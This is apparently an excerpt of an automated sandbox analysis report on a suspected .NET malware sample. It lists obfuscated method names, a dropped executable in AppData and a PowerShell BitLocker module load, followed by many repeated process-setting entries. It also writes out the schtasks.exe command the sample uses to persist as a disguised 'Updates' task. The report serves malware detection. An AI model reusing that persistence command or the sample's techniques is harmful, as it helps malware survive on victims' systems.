              Source: 0.2.file.exe.a400000.6.raw.unpack, m2S1o1vvEKblSvSGBe.csHigh entropy of concatenated method names: 'UFoFIIEfPx', 'sGtFHaaRSV', 'Kf7F9IHW1C', 'f4HFvvIPFL', 'JSFFC1S71s', 'B8kFZaMGDh', 'beSFgAj268', 'dZvFdY0br2', 't6AFhHgfwu', 'kFyFSZeFJr'
              Source: 0.2.file.exe.a400000.6.raw.unpack, hCi7ubO39LUTUumiC2.csHigh entropy of concatenated method names: 'aGsoqQeYti', 'D40o3AYSLc', 'XTSoYVssZ7', 'vdQo6vjlZW', 'P2XowNbF2m', 'hw1Y0jNAsg', 'uTqYuw95hS', 'iOaYbUCd5T', 'FD0Y8GZyfc', 'z3kYeriexH'
              Source: 0.2.file.exe.a400000.6.raw.unpack, F7WtHKJtQWTcou7oqS.csHigh entropy of concatenated method names: 'zlkYKRGMFW', 'vCTYxclDRU', 'zliFGYb0Ca', 'EX5FfKKxBf', 'WYgFBeJGRk', 'i8hFmCRSMA', 'Is7FQ5SmEp', 'GOtFMtvfcM', 'aMBF5ffXFu', 'fEEFTkV3I1'
              Source: 0.2.file.exe.a400000.6.raw.unpack, K8KxjfXRQcRipaOAt1H.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IbU2h4AAj8', 'JUG2S4pEEl', 'Ssj2tN2LPF', 'jHR22dWReo', 'kdT2yecrfG', 'NBt21hRB90', 'nv32pZ8UyK'
              Source: 0.2.file.exe.a400000.6.raw.unpack, lMtam3cA0yx1dQi5MF.csHigh entropy of concatenated method names: 'eSQN9VWtZ9', 'Wt8Nvo3riO', 'QyeNORQHUT', 'XyyNAx5Z0r', 'cswNfet3MF', 'Eg4NBQZYbV', 'pQ2NQdHKvm', 'rQGNMmUAgA', 'PaCNT67THm', 'buwNseurBL'
              Source: 0.2.file.exe.a400000.6.raw.unpack, Cp8HAELrj1ru5cEc6O.csHigh entropy of concatenated method names: 'qSCERfokx', 'M9pI8ug8n', 'a7tHe7eB5', 'HmuxiCk35', 'h2WvlFy3i', 't7cJ0KD2U', 'ykvAxEfyIhf6nM1lO3', 'JumTCBQANw3kyKk8eZ', 'h9ldwIquQ', 'cEbSR3oAa'
              Source: 0.2.file.exe.a400000.6.raw.unpack, JQTcVuRCfs6Kyxwn2i.csHigh entropy of concatenated method names: 'BXxX6346ht', 'i1xXwxbI8G', 'wvEXnKblSv', 'sGBXaeO7Wt', 'V7oXCqSFCi', 'YubXZ39LUT', 'hjoPJNUI8LgHRUX1Sf', 'PKHpVwl7nZslLrZk2Z', 'BxcXXNK2B6', 'eSkXja6w70'
              Source: 0.2.file.exe.a400000.6.raw.unpack, QMCIaMbg5s4A5F1Ftw.csHigh entropy of concatenated method names: 'JsMhCZ3ASZ', 'nY3hg7ifVC', 'AJNhhNpMgh', 'espht4jQVf', 'XUJhyLwe6O', 'i3LhpeS0DN', 'Dispose', 'tODdlodraT', 'yZ9d35MWln', 'CHZdFAZsN7'
              Source: 0.2.file.exe.a400000.6.raw.unpack, unhoQLuGpTXrEEiGIk.csHigh entropy of concatenated method names: 'cXCg8msucl', 'fTHg76MESs', 'OTod4giy9o', 'RYidX639aa', 'yBbgs2WkNi', 'd7WgDMDSgp', 'TGQgc9XmKF', 'zLegPjiUoH', 'ikRgiT9ftb', 'n8egWnj65t'
              Source: 0.2.file.exe.a400000.6.raw.unpack, HNmOmBX4eBFQGadRm6t.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'roZSsLWKKp', 'gCkSDUi03v', 'uD5ScHsJeH', 'mSiSPpP7iB', 'XnLSi2TXUF', 'XFaSWAplPv', 'MUQSkQAXoI'
              Source: 0.2.file.exe.a400000.6.raw.unpack, C346ht9Y1xxbI8GhL8.csHigh entropy of concatenated method names: 'bCK3Pbjhoe', 'rZr3iBwu8M', 'aXC3WcHmrl', 'l1v3k8MBo3', 'QiP30FCTAA', 'DAM3uNi0Am', 'wiJ3bm2jeq', 'dol38ifPOB', 'xPn3eyDSjm', 'DpE374u0ca'
              Source: 0.2.file.exe.a400000.6.raw.unpack, Kp03lmQWNmpMfpEna0.csHigh entropy of concatenated method names: 'WFA6lo3bkq', 'JvO6FELjmU', 'vja6oEt7qD', 'hlZo7EGTdD', 'ViXozDDEtf', 'XlU64mlVl9', 'klW6XQemcW', 'NWt6LApok1', 'lNm6j5YOxs', 'Vcn6RQgJKb'
              Source: 0.2.file.exe.a400000.6.raw.unpack, HuOdfZXXU5PqKvLGHXp.csHigh entropy of concatenated method names: 'bVHS7sh7Lv', 'GD6SzMu4U3', 'hivt409Ux1', 'or9tXhLiY7', 'N5ftL3gCbL', 'wnftjRqJDM', 'sFgtRxN5Wa', 'BWLtqKpAFE', 'TkEtleIFfp', 'wHjt3xoSWt'
              Source: 0.2.file.exe.a400000.6.raw.unpack, L8KxqU5Z5chxFVN1Ct.csHigh entropy of concatenated method names: 'nm06VZFlIh', 'aiJ6UIZRED', 'YyS6EdPQoe', 'eks6ITBoJV', 'Tk66KyWuu5', 'Vcc6HqYGk8', 'jSC6xGREjL', 'pRJ69rymKM', 'Pt06v2IuXL', 'iwX6Jts740'
              Source: 0.2.file.exe.a400000.6.raw.unpack, Urbt7oFB2bKwG3VRLj.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wstLe855n3', 'BZKL7vbiSQ', 'Xw5LzqdBtP', 'zGoj4lvhHZ', 'h5djXXkGqS', 'KKxjLg8HsZ', 'uAIjjOUdWR', 'CPZYrmCimk66nMov6IB'
              Source: 0.2.file.exe.a400000.6.raw.unpack, QZVcKReRAumOGuY0EA.csHigh entropy of concatenated method names: 'EOchOjH0KR', 'wqHhAbCDgl', 'jYEhGO8eyA', 'Hdqhfn7ckw', 'P4dhBqtvrk', 'QethmQ9lbW', 'mCAhQoTlN6', 'dYNhMmV4Cl', 'CcJh5Y6xaC', 'IIThTUJecZ'
              Source: 0.2.file.exe.a400000.6.raw.unpack, x7bpfQ7AV1lU9lutB4.csHigh entropy of concatenated method names: 'DOcSFQPQ8u', 'X43SYq0OJj', 'ihrSoj8id0', 'fq8S681Psy', 'MvdShNFQ2i', 'xfWSweC6Py', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.a400000.6.raw.unpack, UWDZo0zBYX4HeHS04i.csHigh entropy of concatenated method names: 'YCOSHOAOOh', 'jFAS96f3Tm', 'iBLSvX2CRq', 'pY7SOxsnYk', 'KdhSAfPAXO', 'eOWSfMEXid', 'f7NSBAwYKY', 'qtfSp6WGND', 'FlRSVI9HBl', 'JrGSUwSwVg'
              Source: 0.2.file.exe.a400000.6.raw.unpack, NQDUis3aDFjfNFfLCL.csHigh entropy of concatenated method names: 'Dispose', 'O4AXe5F1Ft', 'TtQLAWx8Cw', 'gGHrJHMGoe', 'kVyX7L0Kql', 'sF6XzhS3Au', 'ProcessDialogKey', 'g7PL4ZVcKR', 'dAuLXmOGuY', 'UEALLp7bpf'
              Source: 0.2.file.exe.a400000.6.raw.unpack, grbhcskJK8fq6kUfDJ.csHigh entropy of concatenated method names: 'fPxgnJS4hu', 'UHagasiPUR', 'ToString', 'lPeglU7aff', 'poFg3e5Vd5', 'OdIgFjUxJ9', 'T2DgYewGuF', 'yphgoFgUS2', 'keUg6L52C4', 'bNJgwELrlP'
              Source: 0.2.file.exe.a400000.6.raw.unpack, LL0pDnWLwxJhYsmNZi.csHigh entropy of concatenated method names: 'ToString', 'EFxZsprHOs', 'WldZAKTEVo', 'qDiZGtoumO', 'XY4ZfO1Rc3', 'JCJZBTFEWq', 'pVFZmjyVxs', 'I82ZQvLIfk', 'qciZMcdbUE', 'fKPZ5TOetE'
              Source: 0.2.file.exe.a400000.6.raw.unpack, PdOKg2Pfglta4gw7b6.csHigh entropy of concatenated method names: 'vJpCT8iCCu', 'k18CDOa7tb', 'qB1CPTPiOL', 'T9LCiAPxfo', 'rXaCA7nDSp', 'zkqCGMvyJT', 'AYiCfHWQC9', 'y5YCBi2TmD', 'PugCm7BARt', 'jyrCQbxmno'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QIPlbgwOxDNvtcBdQw.csHigh entropy of concatenated method names: 'FgHjqIT7DP', 'NAdjlbThCd', 'poij3weWBT', 'CA7jFlJe61', 'KbljYSJjil', 'FGGjoiZAYl', 'C2dj6wASdi', 'GvPjwY8xej', 'SQ2jrjWJFI', 'hASjnGUOq7'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, m2S1o1vvEKblSvSGBe.csHigh entropy of concatenated method names: 'UFoFIIEfPx', 'sGtFHaaRSV', 'Kf7F9IHW1C', 'f4HFvvIPFL', 'JSFFC1S71s', 'B8kFZaMGDh', 'beSFgAj268', 'dZvFdY0br2', 't6AFhHgfwu', 'kFyFSZeFJr'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, hCi7ubO39LUTUumiC2.csHigh entropy of concatenated method names: 'aGsoqQeYti', 'D40o3AYSLc', 'XTSoYVssZ7', 'vdQo6vjlZW', 'P2XowNbF2m', 'hw1Y0jNAsg', 'uTqYuw95hS', 'iOaYbUCd5T', 'FD0Y8GZyfc', 'z3kYeriexH'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, F7WtHKJtQWTcou7oqS.csHigh entropy of concatenated method names: 'zlkYKRGMFW', 'vCTYxclDRU', 'zliFGYb0Ca', 'EX5FfKKxBf', 'WYgFBeJGRk', 'i8hFmCRSMA', 'Is7FQ5SmEp', 'GOtFMtvfcM', 'aMBF5ffXFu', 'fEEFTkV3I1'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, K8KxjfXRQcRipaOAt1H.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IbU2h4AAj8', 'JUG2S4pEEl', 'Ssj2tN2LPF', 'jHR22dWReo', 'kdT2yecrfG', 'NBt21hRB90', 'nv32pZ8UyK'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, lMtam3cA0yx1dQi5MF.csHigh entropy of concatenated method names: 'eSQN9VWtZ9', 'Wt8Nvo3riO', 'QyeNORQHUT', 'XyyNAx5Z0r', 'cswNfet3MF', 'Eg4NBQZYbV', 'pQ2NQdHKvm', 'rQGNMmUAgA', 'PaCNT67THm', 'buwNseurBL'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, Cp8HAELrj1ru5cEc6O.csHigh entropy of concatenated method names: 'qSCERfokx', 'M9pI8ug8n', 'a7tHe7eB5', 'HmuxiCk35', 'h2WvlFy3i', 't7cJ0KD2U', 'ykvAxEfyIhf6nM1lO3', 'JumTCBQANw3kyKk8eZ', 'h9ldwIquQ', 'cEbSR3oAa'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, JQTcVuRCfs6Kyxwn2i.csHigh entropy of concatenated method names: 'BXxX6346ht', 'i1xXwxbI8G', 'wvEXnKblSv', 'sGBXaeO7Wt', 'V7oXCqSFCi', 'YubXZ39LUT', 'hjoPJNUI8LgHRUX1Sf', 'PKHpVwl7nZslLrZk2Z', 'BxcXXNK2B6', 'eSkXja6w70'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QMCIaMbg5s4A5F1Ftw.csHigh entropy of concatenated method names: 'JsMhCZ3ASZ', 'nY3hg7ifVC', 'AJNhhNpMgh', 'espht4jQVf', 'XUJhyLwe6O', 'i3LhpeS0DN', 'Dispose', 'tODdlodraT', 'yZ9d35MWln', 'CHZdFAZsN7'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, unhoQLuGpTXrEEiGIk.csHigh entropy of concatenated method names: 'cXCg8msucl', 'fTHg76MESs', 'OTod4giy9o', 'RYidX639aa', 'yBbgs2WkNi', 'd7WgDMDSgp', 'TGQgc9XmKF', 'zLegPjiUoH', 'ikRgiT9ftb', 'n8egWnj65t'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, HNmOmBX4eBFQGadRm6t.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'roZSsLWKKp', 'gCkSDUi03v', 'uD5ScHsJeH', 'mSiSPpP7iB', 'XnLSi2TXUF', 'XFaSWAplPv', 'MUQSkQAXoI'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, C346ht9Y1xxbI8GhL8.csHigh entropy of concatenated method names: 'bCK3Pbjhoe', 'rZr3iBwu8M', 'aXC3WcHmrl', 'l1v3k8MBo3', 'QiP30FCTAA', 'DAM3uNi0Am', 'wiJ3bm2jeq', 'dol38ifPOB', 'xPn3eyDSjm', 'DpE374u0ca'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, Kp03lmQWNmpMfpEna0.csHigh entropy of concatenated method names: 'WFA6lo3bkq', 'JvO6FELjmU', 'vja6oEt7qD', 'hlZo7EGTdD', 'ViXozDDEtf', 'XlU64mlVl9', 'klW6XQemcW', 'NWt6LApok1', 'lNm6j5YOxs', 'Vcn6RQgJKb'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, HuOdfZXXU5PqKvLGHXp.csHigh entropy of concatenated method names: 'bVHS7sh7Lv', 'GD6SzMu4U3', 'hivt409Ux1', 'or9tXhLiY7', 'N5ftL3gCbL', 'wnftjRqJDM', 'sFgtRxN5Wa', 'BWLtqKpAFE', 'TkEtleIFfp', 'wHjt3xoSWt'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, L8KxqU5Z5chxFVN1Ct.csHigh entropy of concatenated method names: 'nm06VZFlIh', 'aiJ6UIZRED', 'YyS6EdPQoe', 'eks6ITBoJV', 'Tk66KyWuu5', 'Vcc6HqYGk8', 'jSC6xGREjL', 'pRJ69rymKM', 'Pt06v2IuXL', 'iwX6Jts740'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, Urbt7oFB2bKwG3VRLj.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wstLe855n3', 'BZKL7vbiSQ', 'Xw5LzqdBtP', 'zGoj4lvhHZ', 'h5djXXkGqS', 'KKxjLg8HsZ', 'uAIjjOUdWR', 'CPZYrmCimk66nMov6IB'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QZVcKReRAumOGuY0EA.csHigh entropy of concatenated method names: 'EOchOjH0KR', 'wqHhAbCDgl', 'jYEhGO8eyA', 'Hdqhfn7ckw', 'P4dhBqtvrk', 'QethmQ9lbW', 'mCAhQoTlN6', 'dYNhMmV4Cl', 'CcJh5Y6xaC', 'IIThTUJecZ'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, x7bpfQ7AV1lU9lutB4.csHigh entropy of concatenated method names: 'DOcSFQPQ8u', 'X43SYq0OJj', 'ihrSoj8id0', 'fq8S681Psy', 'MvdShNFQ2i', 'xfWSweC6Py', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, UWDZo0zBYX4HeHS04i.csHigh entropy of concatenated method names: 'YCOSHOAOOh', 'jFAS96f3Tm', 'iBLSvX2CRq', 'pY7SOxsnYk', 'KdhSAfPAXO', 'eOWSfMEXid', 'f7NSBAwYKY', 'qtfSp6WGND', 'FlRSVI9HBl', 'JrGSUwSwVg'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, NQDUis3aDFjfNFfLCL.csHigh entropy of concatenated method names: 'Dispose', 'O4AXe5F1Ft', 'TtQLAWx8Cw', 'gGHrJHMGoe', 'kVyX7L0Kql', 'sF6XzhS3Au', 'ProcessDialogKey', 'g7PL4ZVcKR', 'dAuLXmOGuY', 'UEALLp7bpf'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, grbhcskJK8fq6kUfDJ.csHigh entropy of concatenated method names: 'fPxgnJS4hu', 'UHagasiPUR', 'ToString', 'lPeglU7aff', 'poFg3e5Vd5', 'OdIgFjUxJ9', 'T2DgYewGuF', 'yphgoFgUS2', 'keUg6L52C4', 'bNJgwELrlP'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, LL0pDnWLwxJhYsmNZi.csHigh entropy of concatenated method names: 'ToString', 'EFxZsprHOs', 'WldZAKTEVo', 'qDiZGtoumO', 'XY4ZfO1Rc3', 'JCJZBTFEWq', 'pVFZmjyVxs', 'I82ZQvLIfk', 'qciZMcdbUE', 'fKPZ5TOetE'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, PdOKg2Pfglta4gw7b6.csHigh entropy of concatenated method names: 'vJpCT8iCCu', 'k18CDOa7tb', 'qB1CPTPiOL', 'T9LCiAPxfo', 'rXaCA7nDSp', 'zkqCGMvyJT', 'AYiCfHWQC9', 'y5YCBi2TmD', 'PugCm7BARt', 'jyrCQbxmno'
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\aVmZDnwW.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
